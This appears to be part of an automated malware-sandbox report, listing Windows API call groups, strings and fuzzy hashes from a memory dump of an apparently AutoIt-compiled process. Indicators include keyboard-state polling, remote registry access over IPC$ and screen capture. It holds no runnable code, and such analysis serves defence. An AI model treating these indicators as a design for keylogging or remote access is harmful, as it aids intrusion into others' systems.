                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: SendString
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 890592661-1007645807
                                                    • Opcode ID: 4eb8801e054d216dca51b622f7061b019b20f70c8e5b56d422b2162649c184e2
                                                    • Instruction ID: ed29e6c08dad34ccef379cf739d729c77d59275571fb851a89f8718a2312b79b
                                                    • Opcode Fuzzy Hash: 4eb8801e054d216dca51b622f7061b019b20f70c8e5b56d422b2162649c184e2
                                                    • Instruction Fuzzy Hash: F711B22165016979E721BAB1DC8AEFF7F3CEFD2B40F50402BB809A60D1DA691D05CAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • timeGetTime.WINMM ref: 0042521C
                                                      • Part of subcall function 003E0719: timeGetTime.WINMM(?,77438EC0,003D0FF9), ref: 003E071D
                                                    • Sleep.KERNEL32(0000000A), ref: 00425248
                                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0042526C
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0042528E
                                                    • SetActiveWindow.USER32 ref: 004252AD
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004252BB
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004252DA
                                                    • Sleep.KERNEL32(000000FA), ref: 004252E5
                                                    • IsWindow.USER32 ref: 004252F1
                                                    • EndDialog.USER32(00000000), ref: 00425302
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 4732df5ecdcb78d6ee4d79f6d401cab4ed919ca38e366cdef2579569a919a1aa
                                                    • Instruction ID: 1a35f79e0c67130aa8dd62259c29ea87c5e1f86cda06a1f9863153446abf7f33
                                                    • Opcode Fuzzy Hash: 4732df5ecdcb78d6ee4d79f6d401cab4ed919ca38e366cdef2579569a919a1aa
                                                    • Instruction Fuzzy Hash: 96219274304714FFE7005B20FD89A2A3B69EB4639AB9018BEF405852B1DB799C458B3E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemCount.USER32 ref: 003FD7CD
                                                    • GetMenuItemCount.USER32 ref: 003FD87D
                                                    • GetCursorPos.USER32(?), ref: 003FD8C1
                                                    • SetForegroundWindow.USER32(00000000), ref: 003FD8CA
                                                    • TrackPopupMenuEx.USER32(00486890,00000000,?,00000000,00000000,00000000), ref: 003FD8DD
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003FD8E9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID:
                                                    • API String ID: 36266755-0
                                                    • Opcode ID: 522402264e95e9b97f29e5cfc4c70c7e98202137d26716d311e3922d7bf1c2a2
                                                    • Instruction ID: db9083b0c1e4daa84bcea29ca01355faa9ffb71df3bc00b16e14b01bae714d38
                                                    • Opcode Fuzzy Hash: 522402264e95e9b97f29e5cfc4c70c7e98202137d26716d311e3922d7bf1c2a2
                                                    • Instruction Fuzzy Hash: 7D712971604219BEFB329F15DC49FAABF69FF05364F20022AF215AA0D1C7B56824DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004205A7
                                                    • SetKeyboardState.USER32(?), ref: 00420612
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00420632
                                                    • GetKeyState.USER32(000000A0), ref: 00420649
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00420678
                                                    • GetKeyState.USER32(000000A1), ref: 00420689
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004206B5
                                                    • GetKeyState.USER32(00000011), ref: 004206C3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004206EC
                                                    • GetKeyState.USER32(00000012), ref: 004206FA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00420723
                                                    • GetKeyState.USER32(0000005B), ref: 00420731
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a1c0b258ad37c20466d367bce14d8c85532f1d3f487049068e22847fd87e31de
                                                    • Instruction ID: 72b28b1226b40cecf502d3d6f120150051a346ff5db5bf307d653b73e0311a3c
                                                    • Opcode Fuzzy Hash: a1c0b258ad37c20466d367bce14d8c85532f1d3f487049068e22847fd87e31de
                                                    • Instruction Fuzzy Hash: C351EE20B047A429FB34DBA0A4557EBAFF49F11380F88459FD5C1562C3DA6C9A8CCB6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDlgItem.USER32 ref: 0041C746
                                                    • GetWindowRect.USER32 ref: 0041C758
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041C7B6
                                                    • GetDlgItem.USER32 ref: 0041C7C1
                                                    • GetWindowRect.USER32 ref: 0041C7D3
                                                    • MoveWindow.USER32(00000001,?,?,00000001,?,00000000), ref: 0041C827
                                                    • GetDlgItem.USER32 ref: 0041C835
                                                    • GetWindowRect.USER32 ref: 0041C846
                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 0041C889
                                                    • GetDlgItem.USER32 ref: 0041C897
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000000), ref: 0041C8B4
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0041C8C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: dedd068e6a94ac5521fb954f57765ea50509b8902c5609bc90780fb3a49fa0d4
                                                    • Instruction ID: 1e77448fada0b42a4b75d5ff8280ece9c27990236fc0fbadf78c2ca899324eb4
                                                    • Opcode Fuzzy Hash: dedd068e6a94ac5521fb954f57765ea50509b8902c5609bc90780fb3a49fa0d4
                                                    • Instruction Fuzzy Hash: FC5183B5A40205BFEB04CFA8DD89EBF7BB9EB85311F10812EF515D2290D7709944CB24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C2036,?,00000000,?,?,?,?,003C16CB,00000000,?), ref: 003C1B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003C20D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003C216E
                                                    • DestroyAcceleratorTable.USER32 ref: 003FBEF6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF27
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF3E
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF5A
                                                    • DeleteObject.GDI32(00000000), ref: 003FBF6C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: de603d86e3513c1ac6c9f2829e1146a21efdfa69abcebb02828690a548e47e95
                                                    • Instruction ID: 0176a11737b5c336dfba27f219c3bcc42188a81bcab5bbb086e7f68f4fa234a4
                                                    • Opcode Fuzzy Hash: de603d86e3513c1ac6c9f2829e1146a21efdfa69abcebb02828690a548e47e95
                                                    • Instruction Fuzzy Hash: F6617835101714DFCB26AF18DD48B2AB7F1FB41316F16883EE1428A960C775AC95DF98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    • GetSysColor.USER32(0000000F), ref: 003C21D3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: b8f6c65c64a35d06a280489f92562e71346107ebf234f6cc33d684b1e200af13
                                                    • Instruction ID: 0ea0870a811a1edddbbdb0b69f918e516a716030bd12e24627504937cd0ceaca
                                                    • Opcode Fuzzy Hash: b8f6c65c64a35d06a280489f92562e71346107ebf234f6cc33d684b1e200af13
                                                    • Instruction Fuzzy Hash: 9741A035100148AEDB629F68EC48FBA3B69EB07331F154679FE65CA1E2C7319C42DB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                    • String ID: %s%u
                                                    • API String ID: 1412819556-679674701
                                                    • Opcode ID: 671417ccefcd845a7825f47cb8ab3e7b8e9abfbaec9daa3f38cf112ff2623a38
                                                    • Instruction ID: 511f732994084c9eb7324a28363061bb9fe7c6af9881a5e828e46c8643917eef
                                                    • Opcode Fuzzy Hash: 671417ccefcd845a7825f47cb8ab3e7b8e9abfbaec9daa3f38cf112ff2623a38
                                                    • Instruction Fuzzy Hash: 16A10171205756AFD715DF20C884BEBB7E9FF04305F00462AF999C2290DB38E9A5CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 3725905772-1539354611
                                                    • Opcode ID: a9b60a930ba063f4af8b5bc6ddf2b5e0fa8277fc0011fa42c6104fa42c51ad29
                                                    • Instruction ID: 84c1b77de85cb5ef8f3858658bbf3f4d475b3ce5becedee00c900e51b1b269f9
                                                    • Opcode Fuzzy Hash: a9b60a930ba063f4af8b5bc6ddf2b5e0fa8277fc0011fa42c6104fa42c51ad29
                                                    • Instruction Fuzzy Hash: 868190710043059BDB05DF11C985FEB7BE8EF54318F04856AFD898A2A2DB38DD89CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                      • Part of subcall function 003C2344: GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                      • Part of subcall function 003C2344: ScreenToClient.USER32 ref: 003C2374
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0044C2E4
                                                    • ImageList_EndDrag.COMCTL32 ref: 0044C2EA
                                                    • ReleaseCapture.USER32 ref: 0044C2F0
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0044C39A
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0044C3AD
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0044C48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prH$prH
                                                    • API String ID: 1924731296-3737415381
                                                    • Opcode ID: 9ffd956b384fbb88ad94e0f3144c05c7408e84acfa36198f458917a08f126096
                                                    • Instruction ID: b4e7a8d7b9e0cc7260983cd629f68e70688dd0066dbbdd350a726d8fc35f4ee2
                                                    • Opcode Fuzzy Hash: 9ffd956b384fbb88ad94e0f3144c05c7408e84acfa36198f458917a08f126096
                                                    • Instruction Fuzzy Hash: 7B519C74204304AFE700EF20CC96F6E7BE4EB88314F14892EF5958B2E1CB75A958CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,00000001,?,003FE452,?,0000138C,?,00000001,?,?,?,00000001), ref: 0041FDEF
                                                    • LoadStringW.USER32(00000000,?,003FE452,?), ref: 0041FDF8
                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003FE452,?,0000138C,?,00000001,?,?,?,00000001,?), ref: 0041FE1A
                                                    • LoadStringW.USER32(00000000,?,003FE452,?), ref: 0041FE1D
                                                    • MessageBoxW.USER32(00000000,00000004,?,00011010), ref: 0041FF3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 4072794657-2268648507
                                                    • Opcode ID: e4e9b8de09828a077c798f1ba00ca23e60d248b21d0528b8e744ad6ca3ba72a8
                                                    • Instruction ID: b92987dd25c687dd3114088bedab92047d90f12c59e43bd48a24fdae5ace7c47
                                                    • Opcode Fuzzy Hash: e4e9b8de09828a077c798f1ba00ca23e60d248b21d0528b8e744ad6ca3ba72a8
                                                    • Instruction Fuzzy Hash: 45414E72804219AACB16FBE0DD86EEE773CAF15300F50016AF505BA092DB756F4ACF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WNetAddConnection2W.MPR(?,?,00000001,?), ref: 00417DE8
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00417E04
                                                    • RegOpenKeyExW.ADVAPI32(?,?,?,00020019,?), ref: 00417E20
                                                    • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00000001), ref: 00417E4A
                                                    • CLSIDFromString.OLE32(?,?), ref: 00417E72
                                                    • RegCloseKey.ADVAPI32(?), ref: 00417E7D
                                                    • RegCloseKey.ADVAPI32(?), ref: 00417E82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 3030280669-22481851
                                                    • Opcode ID: c1524b87095c610dc5782e6cdc35ee7eb05b2f7ef94c782d677b740bdeb23586
                                                    • Instruction ID: 96ead91ee00cc5346bea2acb6b680d7410b48d92274877dd1f514639caa89d33
                                                    • Opcode Fuzzy Hash: c1524b87095c610dc5782e6cdc35ee7eb05b2f7ef94c782d677b740bdeb23586
                                                    • Instruction Fuzzy Hash: 97410A7681422CAEDF12EBA4EC85DFEB778FF18750B04406AF805A6161DB355E45CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042A47A
                                                    • CreateDirectoryW.KERNEL32(?), ref: 0042A4D9
                                                    • CreateFileW.KERNEL32(?,40000000,?,?,00000003,02200000), ref: 0042A4FE
                                                    • DeviceIoControl.KERNEL32 ref: 0042A58E
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000003,02200000), ref: 0042A599
                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000003,02200000), ref: 0042A5A2
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000003,02200000), ref: 0042A5AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 3827137101-3457252023
                                                    • Opcode ID: 038f851cda583ed20d52a374d90f2bd08d37fab172547e1dd2685671640adad9
                                                    • Instruction ID: 81fe449293507c7876577fead9c710cc3e072979614274d3519873739323d455
                                                    • Opcode Fuzzy Hash: 038f851cda583ed20d52a374d90f2bd08d37fab172547e1dd2685671640adad9
                                                    • Instruction Fuzzy Hash: 4B31C076600119BBDB219FA0EC49FFB777CEF89301F1041B6FA08D6151EA7497588B29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004477CD
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004477D4
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004477E7
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004477EF
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004477FA
                                                    • DeleteDC.GDI32(00000000), ref: 00447803
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0044780D
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001,?,?,?,?,003FCCE5,?,?,?,?,?,?,?), ref: 00447821
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0044782D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 3ab91ef50da6a7622cdf2e4753cde6aa9b56efa7897f166b7b39539bec9b0b70
                                                    • Instruction ID: 048e9daaf9dcbe6929adfdedd3f18ee8be94fbfa08b55a28289174b2467cff57
                                                    • Opcode Fuzzy Hash: 3ab91ef50da6a7622cdf2e4753cde6aa9b56efa7897f166b7b39539bec9b0b70
                                                    • Instruction Fuzzy Hash: 35317075105114BFEF119FA4DC48FEB3F69FF0A325F110226FA15A51A0C7359816DBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0042D855
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0042D8E8
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0042D8FC
                                                    • CoCreateInstance.OLE32(00452D7C,00000000,00000001,0047A89C,?), ref: 0042D948
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0042D9B7
                                                    • CoTaskMemFree.OLE32(?,?), ref: 0042DA0F
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0042DA88
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0042DAAB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 0042DAB2
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0042DAE9
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0042DAEB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                    • String ID:
                                                    • API String ID: 2762341140-0
                                                    • Opcode ID: 8aea69068d5438452543086323a6a43928127bdb736ae04b474dad8aabb0709c
                                                    • Instruction ID: b4156b2f9b20499d3e00a2d18c68062677779740606b5d782628ccfd451626c8
                                                    • Opcode Fuzzy Hash: 8aea69068d5438452543086323a6a43928127bdb736ae04b474dad8aabb0709c
                                                    • Instruction Fuzzy Hash: 35B12F75A00118AFDB04DFA4D888EAEBBF9FF49304B1584A9F809EB251DB34ED45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004376A2
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004376AE
                                                    • CreateCompatibleDC.GDI32(00000006), ref: 004376BA
                                                    • SelectObject.GDI32(00000000,00000006), ref: 004376C7
                                                    • StretchBlt.GDI32(?,00000000,00000000,00000007,?,00000006,?,?,00000007,?,00CC0020), ref: 0043771B
                                                    • GetDIBits.GDI32(?,00000006,?,?,?,00000028), ref: 00437757
                                                    • GetDIBits.GDI32(?,00000006,00000000,?,00000000,00000028,00000000), ref: 0043777B
                                                    • SelectObject.GDI32(?,?), ref: 00437783
                                                    • DeleteObject.GDI32(00000006), ref: 0043778C
                                                    • DeleteDC.GDI32(?), ref: 00437793
                                                    • ReleaseDC.USER32 ref: 0043779E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID:
                                                    • API String ID: 2598888154-0
                                                    • Opcode ID: 9b72b70f9bd966ea0b8a388189045bda1d33cc50c6040c09fa5fa3ba556bf0d2
                                                    • Instruction ID: a217780bc818d9fd79d65492d9f6658a648c26d103fd5c138d593eafc126fd47
                                                    • Opcode Fuzzy Hash: 9b72b70f9bd966ea0b8a388189045bda1d33cc50c6040c09fa5fa3ba556bf0d2
                                                    • Instruction Fuzzy Hash: F65180B5904209EFDB25CFA8DC85EAFBBB8EF49310F10842EF58997210C735A844CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

